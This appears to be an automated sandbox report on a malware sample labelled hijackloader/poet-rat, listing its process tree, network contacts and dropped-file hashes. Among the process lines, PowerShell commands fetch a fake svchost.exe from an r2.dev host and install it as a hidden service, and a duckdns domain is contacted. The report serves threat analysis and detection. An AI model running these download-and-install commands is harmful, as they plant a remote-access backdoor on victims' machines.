PID 3636 wrote to memory of 1480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 1480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 3284 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\local\svchost\svchost.exe
PID 1480 wrote to memory of 3284 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\local\svchost\svchost.exe
PID 668 wrote to memory of 4340 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4340 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4972 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 4972 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 4292 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4292 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4968 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 4968 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4872 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4872 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 1536 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 668 wrote to memory of 1536 | N/A | C:\Users\Admin\AppData\local\svchost\svchost.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"

C:\Windows\explorer.exe

explorer.exe "_가이아서버 접속기.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"

C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe

"C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 60 -ip 60

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"

C:\Users\Admin\AppData\local\svchost\svchost.exe

"C:\Users\Admin\AppData\local\svchost\svchost.exe" -install

C:\Users\Admin\AppData\local\svchost\svchost.exe

"C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -

Network

Country  Destination          Domain                                        Proto
US       8.8.8.8:53           files.catbox.moe                              udp
US       108.181.20.35:443    files.catbox.moe                              tcp
US       8.8.8.8:53           g.bing.com                                    udp
US       150.171.28.10:443    g.bing.com                                    tcp
US       8.8.8.8:53           69.31.126.40.in-addr.arpa                     udp
US       8.8.8.8:53           35.20.181.108.in-addr.arpa                    udp
US       8.8.8.8:53           172.210.232.199.in-addr.arpa                  udp
US       8.8.8.8:53           43.58.199.20.in-addr.arpa                     udp
US       8.8.8.8:53           95.221.229.192.in-addr.arpa                   udp
US       8.8.8.8:53           pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev   udp
US       172.66.0.235:443     pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev   tcp
US       8.8.8.8:53           235.0.66.172.in-addr.arpa                     udp
US       172.66.0.235:443     pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev   tcp
US       8.8.8.8:53           sktelecom.duckdns.org                         udp
KR       203.234.238.140:443  sktelecom.duckdns.org                         tcp
US       8.8.8.8:53           140.238.234.203.in-addr.arpa                  udp
US       8.8.8.8:53           88.210.23.2.in-addr.arpa                      udp
US       8.8.8.8:53           56.163.245.4.in-addr.arpa                     udp
US       8.8.8.8:53           15.164.165.52.in-addr.arpa                    udp
US       8.8.8.8:53           75.117.19.2.in-addr.arpa                      udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yp0eioo.pub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe

MD5 c5fc53d3969bea56dc506c473b805c13
SHA1 7c59712142fe98d48ca6276851ee890585c9772a
SHA256 21956ec4108a00fc6aae28ffa52ebb3dd76a1d9d1adac9648df2a6354646052c
SHA512 79d45c966c534831b26e71b48f0a0690a8a61e4d47998deb1b2e35fb50a26fdea072db34805c7e1db35f105e3bd062f05094b102d5d6290bfa20c0847485856b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5063fb2c6625068c1224c68b5c1ce46
SHA1 8867a7637689af271e445a7379c810335591e708
SHA256 2bfdeab5f252777c7bbbb7b8b033e03e37d3e2061dce73c8af03c196e1b26bfe
SHA512 ad62e5268c8fe5b7b72d40d8724ab7ae2fa3d3e910122ad36f61e6c1ec81c22e1ef3b4477006085212b20342aa073ee2275e0095e92c4ac350df6814149aca58

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a12c129e02e3d0e0ff14020158d6e53
SHA1 383434d0df826622f06b1f3811124782df21507b
SHA256 e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7
SHA512 4b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d

C:\Users\Admin\AppData\local\svchost\svchost.exe

MD5 400b9faa5f261a5a0d194e633483571c
SHA1 b5bf2b5692d6e2eb800406d77a5f1de6a852ede8
SHA256 1dbe9d36ce4a1dfb469fb20c1b2b8964e5e08a96f3cf46ba6bdfc27247d97b65
SHA512 3cce6f30a3c2c2b09d13292d0de3fc0809f3617874e642b914ec9ee3982a915d20bfd25b9db40e3dc63b390ffcb9ef57654b9d82760b4a2ab3f4cc76914164d5

C:\Users\Admin\AppData\local\svchost\svchost.msh

MD5 90f91efb0b6cc632ea6b2bb3a6d5fb40
SHA1 e46a39e7252e086f34d64c3d720442cd325de506
SHA256 7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9
SHA512 f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

C:\Users\Admin\AppData\Local\svchost\svchost.db.tmp

MD5 72085bad44dad6707a598fd489c6850d
SHA1 37f2e77c5a5e1981c2753b974017d1842965f910
SHA256 cc591d737cad43ec26a49ddb9128c42d709b0f0cff9630b77c963a263439e56f
SHA512 0be7a5c2c1d351f4d041b9525c307dcdb8f365c543e7d1eb44761812458895be65f776c8dd5cc85ddfe9defe922f5c468ff266c242ccc895b928f388b70552ca